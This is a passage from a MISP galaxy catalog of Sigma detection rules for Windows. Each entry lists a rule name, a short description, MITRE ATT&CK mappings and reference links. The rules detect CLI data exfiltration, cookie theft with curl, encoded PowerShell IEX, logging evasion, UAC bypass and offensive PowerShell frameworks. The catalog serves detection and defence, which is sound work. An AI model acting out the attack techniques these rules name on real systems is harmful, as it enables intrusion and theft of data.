The tag is: misp-galaxy:sigma-rules="MSExchange Transport Agent Installation"

MSExchange Transport Agent Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Transport Agent - T1505.002" with estimative-language:likelihood-probability="almost-certain"

Table 10949. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=7

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_msexchange_transport_agent.yml

Potential Data Exfiltration Activity Via CommandLine Tools

Detects the use of various CLI utilities exfiltrating data via web requests

The tag is: misp-galaxy:sigma-rules="Potential Data Exfiltration Activity Via CommandLine Tools"

Potential Data Exfiltration Activity Via CommandLine Tools has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10950. Table References

Links

https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_data_exfiltration_via_cli.yml

HackTool - KrbRelayUp Execution

Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced

The tag is: misp-galaxy:sigma-rules="HackTool - KrbRelayUp Execution"

HackTool - KrbRelayUp Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1550.003" with estimative-language:likelihood-probability="almost-certain"

Table 10951. Table References

Links

https://github.com/Dec0ne/KrbRelayUp

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_krbrelayup.yml

Rundll32 Execution Without CommandLine Parameters

Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity

The tag is: misp-galaxy:sigma-rules="Rundll32 Execution Without CommandLine Parameters"

Rundll32 Execution Without CommandLine Parameters has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10952. Table References

Links

https://www.cobaltstrike.com/help-opsec

https://twitter.com/ber_m1ng/status/1397948048135778309

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_no_params.yml

Potential Binary Impersonating Sysinternals Tools

Detects binaries that use the same name as legitimate sysinternals tools to evade detection

The tag is: misp-galaxy:sigma-rules="Potential Binary Impersonating Sysinternals Tools"

Potential Binary Impersonating Sysinternals Tools has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10953. Table References

Links

https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_tools_masquerading.yml

Detects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values

The tag is: misp-galaxy:sigma-rules="Potential Tampering With RDP Related Registry Keys Via Reg.EXE"

Potential Tampering With RDP Related Registry Keys Via Reg.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 10955. Table References

Links

https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_rdp_keys_tamper.yml

Disable of ETW Trace

Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.

The tag is: misp-galaxy:sigma-rules="Disable of ETW Trace"

Disable of ETW Trace has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Blocking - T1562.006" with estimative-language:likelihood-probability="almost-certain"

Table 10957. Table References

Links

https://abuse.io/lockergoga.txt

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil

https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_etw_trace_evasion.yml

Potential Crypto Mining Activity

Detects command line parameters or strings often used by crypto miners

The tag is: misp-galaxy:sigma-rules="Potential Crypto Mining Activity"

Potential Crypto Mining Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Resource Hijacking - T1496" with estimative-language:likelihood-probability="almost-certain"

Table 10958. Table References

Links

https://www.poolwatch.io/coin/monero

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crypto_mining_monero.yml

Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE

Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall

The tag is: misp-galaxy:sigma-rules="Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE"

Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 10959. Table References

Links

https://www.virusradar.com/en/Win32_Kasidet.AD/description

https://www.hybrid-analysis.com/sample/07e789f4f2f3259e7559fdccb36e96814c2dbff872a21e1fa03de9ee377d581f?environmentId=100

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_allow_program_in_susp_location.yml

HackTool - PurpleSharp Execution

Detects the execution of the PurpleSharp adversary simulation tool

The tag is: misp-galaxy:sigma-rules="HackTool - PurpleSharp Execution"

HackTool - PurpleSharp Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Develop Capabilities - T1587" with estimative-language:likelihood-probability="almost-certain"

Table 10960. Table References

Links

https://github.com/mvelazc0/PurpleSharp

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_purplesharp_indicators.yml

Suspicious MSHTA Child Process

Detects a suspicious process spawning from an "mshta.exe" process, which could be indicative of a malicious HTA script execution

The tag is: misp-galaxy:sigma-rules="Suspicious MSHTA Child Process"

Suspicious MSHTA Child Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"

Table 10962. Table References

Links

https://www.trustedsec.com/july-2015/malicious-htas/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_susp_child_processes.yml

PUA - CleanWipe Execution

Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.

The tag is: misp-galaxy:sigma-rules="PUA - CleanWipe Execution"

PUA - CleanWipe Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10963. Table References

Links

https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/CleanWipe

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_cleanwipe.yml

Suspicious Child Process Of Veeam Dabatase

Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection.

The tag is: misp-galaxy:sigma-rules="Suspicious Child Process Of Veeam Dabatase"

Table 10964. Table References

Links

https://labs.withsecure.com/publications/fin7-target-veeam-servers

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mssql_veaam_susp_child_processes.yml

Active Directory Database Snapshot Via ADExplorer

Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database.

The tag is: misp-galaxy:sigma-rules="Active Directory Database Snapshot Via ADExplorer"

Active Directory Database Snapshot Via ADExplorer has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 10965. Table References

Links

https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_adexplorer_execution.yml

Suspicious Rundll32 Execution With Image Extension

Detects the execution of Rundll32.exe with DLL files masquerading as image files

The tag is: misp-galaxy:sigma-rules="Suspicious Rundll32 Execution With Image Extension"

Suspicious Rundll32 Execution With Image Extension has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 10966. Table References

Links

https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_susp_execution_with_image_extension.yml

Potential UAC Bypass Via Sdclt.EXE

A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.

The tag is: misp-galaxy:sigma-rules="Potential UAC Bypass Via Sdclt.EXE"

Potential UAC Bypass Via Sdclt.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10967. Table References

Links

https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md

https://github.com/OTRF/detection-hackathon-apt29/issues/6

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_sdclt.yml

Compress Data and Lock With Password for Exfiltration With 7-ZIP

An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities

The tag is: misp-galaxy:sigma-rules="Compress Data and Lock With Password for Exfiltration With 7-ZIP"

Compress Data and Lock With Password for Exfiltration With 7-ZIP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

Table 10968. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_7zip_password_compression.yml

New Network Trace Capture Started Via Netsh.EXE

Detects the execution of netsh with the "trace" flag in order to start a network capture

The tag is: misp-galaxy:sigma-rules="New Network Trace Capture Started Via Netsh.EXE"

New Network Trace Capture Started Via Netsh.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"

Table 10969. Table References

Links

https://klausjochem.me/2016/02/03/netsh-the-cyber-attackers-tool-of-choice/

https://blogs.msdn.microsoft.com/canberrapfe/2012/03/30/capture-a-network-trace-without-installing-anything-capture-a-network-trace-of-a-reboot/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_packet_capture.yml

Winrar Execution in Non-Standard Folder

Detects a suspicious winrar execution in a folder which is not the default installation folder

The tag is: misp-galaxy:sigma-rules="Winrar Execution in Non-Standard Folder"

Winrar Execution in Non-Standard Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

Table 10970. Table References

Links

https://twitter.com/cyb3rops/status/1460978167628406785

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrar_uncommon_folder_execution.yml

Suspicious Child Process Of Wermgr.EXE

Detects suspicious Windows Error Reporting manager (wermgr.exe) child process

The tag is: misp-galaxy:sigma-rules="Suspicious Child Process Of Wermgr.EXE"

Suspicious Child Process Of Wermgr.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 10971. Table References

Links

https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html

https://www.echotrail.io/insights/search/wermgr.exe

https://github.com/binderlabs/DirCreate2System

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wermgr_susp_child_process.yml

Suspicious PowerShell Invocations - Specific - ProcessCreation

Detects suspicious PowerShell invocation command parameters

The tag is: misp-galaxy:sigma-rules="Suspicious PowerShell Invocations - Specific - ProcessCreation"

Table 10972. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_invocation_specific.yml

Potential Amazon SSM Agent Hijacking

Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.

The tag is: misp-galaxy:sigma-rules="Potential Amazon SSM Agent Hijacking"

Potential Amazon SSM Agent Hijacking has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 10973. Table References

Links

https://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/

https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/

https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ssm_agent_abuse.yml

Potential Suspicious Windows Feature Enabled - ProcCreation

Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images

The tag is: misp-galaxy:sigma-rules="Potential Suspicious Windows Feature Enabled - ProcCreation"

Table 10974. Table References

Links

https://learn.microsoft.com/en-us/windows/wsl/install-on-server

https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps

https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_enable_susp_windows_optional_feature.yml

Potential Cookies Session Hijacking

Detects execution of "curl.exe" with the "-c" flag in order to save cookie data.

The tag is: misp-galaxy:sigma-rules="Potential Cookies Session Hijacking"

Table 10975. Table References

Links

https://curl.se/docs/manpage.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking.yml

Suspicious Driver/DLL Installation Via Odbcconf.EXE

Detects execution of "odbcconf" with the "INSTALLDRIVER" action where the driver doesn’t contain a ".dll" extension. This is often used as a defense evasion method.

The tag is: misp-galaxy:sigma-rules="Suspicious Driver/DLL Installation Via Odbcconf.EXE"

Suspicious Driver/DLL Installation Via Odbcconf.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Odbcconf - T1218.008" with estimative-language:likelihood-probability="almost-certain"

Table 10976. Table References

Links

https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/

https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176

https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_driver_install_susp.yml

Potentially Suspicious Call To Win32_NTEventlogFile Class

Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Call To Win32_NTEventlogFile Class"

Table 10977. Table References

Links

https://learn.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa394225(v=vs.85)

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_nteventlogfile_usage.yml

Invoke-Obfuscation Via Use Clip

Detects Obfuscated Powershell via use Clip.exe in Scripts

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Via Use Clip"

Invoke-Obfuscation Via Use Clip has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10978. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml

SQL Client Tools PowerShell Session Detection

This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.

The tag is: misp-galaxy:sigma-rules="SQL Client Tools PowerShell Session Detection"

SQL Client Tools PowerShell Session Detection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"

Table 10979. Table References

Links

https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OtherMSBinaries/Sqltoolsps.yml

https://twitter.com/pabraeken/status/993298228840992768

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml

Filter Driver Unloaded Via Fltmc.EXE

Detect filter driver unloading activity via fltmc.exe

The tag is: misp-galaxy:sigma-rules="Filter Driver Unloaded Via Fltmc.EXE"

Filter Driver Unloaded Via Fltmc.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"

Table 10980. Table References

Links

https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon

https://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fltmc_unload_driver.yml

PowerShell Base64 Encoded IEX Cmdlet

Detects usage of a base64 encoded "IEX" cmdlet in a process command line

The tag is: misp-galaxy:sigma-rules="PowerShell Base64 Encoded IEX Cmdlet"

PowerShell Base64 Encoded IEX Cmdlet has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10981. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_iex.yml

Driver/DLL Installation Via Odbcconf.EXE

Detects execution of "odbcconf" with "INSTALLDRIVER" which installs a new ODBC driver. Attackers abuse this to install and run malicious DLLs.

The tag is: misp-galaxy:sigma-rules="Driver/DLL Installation Via Odbcconf.EXE"

Driver/DLL Installation Via Odbcconf.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Odbcconf - T1218.008" with estimative-language:likelihood-probability="almost-certain"

Table 10982. Table References

Links

https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/

https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176

https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_driver_install.yml

Audio Capture via SoundRecorder

Detect attacker collecting audio via SoundRecorder application.

The tag is: misp-galaxy:sigma-rules="Audio Capture via SoundRecorder"

Audio Capture via SoundRecorder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"

Table 10983. Table References

Links

https://eqllib.readthedocs.io/en/latest/analytics/f72a98cb-7b3d-4100-99c3-a138b6e9ff6e.html

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_soundrecorder_audio_capture.yml

Remote Access Tool - NetSupport Execution

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

The tag is: misp-galaxy:sigma-rules="Remote Access Tool - NetSupport Execution"

Remote Access Tool - NetSupport Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 10984. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_netsupport.yml

Malicious PowerShell Commandlets - ProcessCreation

Detects Commandlet names from well-known PowerShell exploitation frameworks

The tag is: misp-galaxy:sigma-rules="Malicious PowerShell Commandlets - ProcessCreation"

Malicious PowerShell Commandlets - ProcessCreation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Permission Groups Discovery - T1069" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10985. Table References

Links

https://github.com/adrecon/AzureADRecon

https://github.com/besimorhino/powercat

https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html

https://github.com/DarkCoderSc/PowerRunAsSystem/

https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1

https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries

https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1

https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1

https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/

https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1

https://github.com/calebstewart/CVE-2021-1675

https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/

https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1

https://github.com/samratashok/nishang

https://github.com/Kevin-Robertson/Powermad

https://github.com/HarmJ0y/DAMP

https://github.com/adrecon/ADRecon

https://adsecurity.org/?p=2921

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_malicious_cmdlets.yml

Suspicious Extexport Execution

Extexport.exe loads dll and is execute from other folder the original path

The tag is: misp-galaxy:sigma-rules="Suspicious Extexport Execution"

Suspicious Extexport Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10986. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Extexport/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extexport.yml

Msiexec Quiet Installation

Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)

The tag is: misp-galaxy:sigma-rules="Msiexec Quiet Installation"

Msiexec Quiet Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"

Table 10987. Table References

Links

https://twitter.com/st0pp3r/status/1583914244344799235

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_install_quiet.yml

Suspicious RDP Redirect Using TSCON

Detects a suspicious RDP session redirect using tscon.exe

The tag is: misp-galaxy:sigma-rules="Suspicious RDP Redirect Using TSCON"

Suspicious RDP Redirect Using TSCON has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="RDP Hijacking - T1563.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

Table 10988. Table References

Links

https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6

https://www.hackingarticles.in/rdp-session-hijacking-with-tscon/

http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tscon_rdp_redirect.yml

PUA - Adidnsdump Execution

This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed, Usee to Query/modify DNS records for Active Directory integrated DNS via LDAP

The tag is: misp-galaxy:sigma-rules="PUA - Adidnsdump Execution"

PUA - Adidnsdump Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

Table 10989. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-9---remote-system-discovery---adidnsdump

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_python_adidnsdump.yml

PowerShell Base64 Encoded Reflective Assembly Load

Detects base64 encoded .NET reflective loading of Assembly

The tag is: misp-galaxy:sigma-rules="PowerShell Base64 Encoded Reflective Assembly Load"

PowerShell Base64 Encoded Reflective Assembly Load has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Reflective Code Loading - T1620" with estimative-language:likelihood-probability="almost-certain"

Table 10990. Table References

Links

https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar

https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load.yml

Read Contents From Stdin Via Cmd.EXE

Detect the use of "<" to read and potentially execute a file via cmd.exe

The tag is: misp-galaxy:sigma-rules="Read Contents From Stdin Via Cmd.EXE"

Read Contents From Stdin Via Cmd.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 10991. Table References

Links

https://web.archive.org/web/20220306121156/https://www.x86matthew.com/view_post?id=ntdll_pipe

https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1059.003/T1059.003.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_stdin_redirect.yml

Renamed Whoami Execution

Detects the execution of whoami that has been renamed to a different name to avoid detection

The tag is: misp-galaxy:sigma-rules="Renamed Whoami Execution"

Renamed Whoami Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 10992. Table References

Links

https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/

https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_whoami.yml

Visual Studio Code Tunnel Shell Execution

Detects the execution of a shell (powershell, bash, wsl…​) via Visual Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel and execute arbitrary commands on the system.

The tag is: misp-galaxy:sigma-rules="Visual Studio Code Tunnel Shell Execution"

Visual Studio Code Tunnel Shell Execution has relationships with:

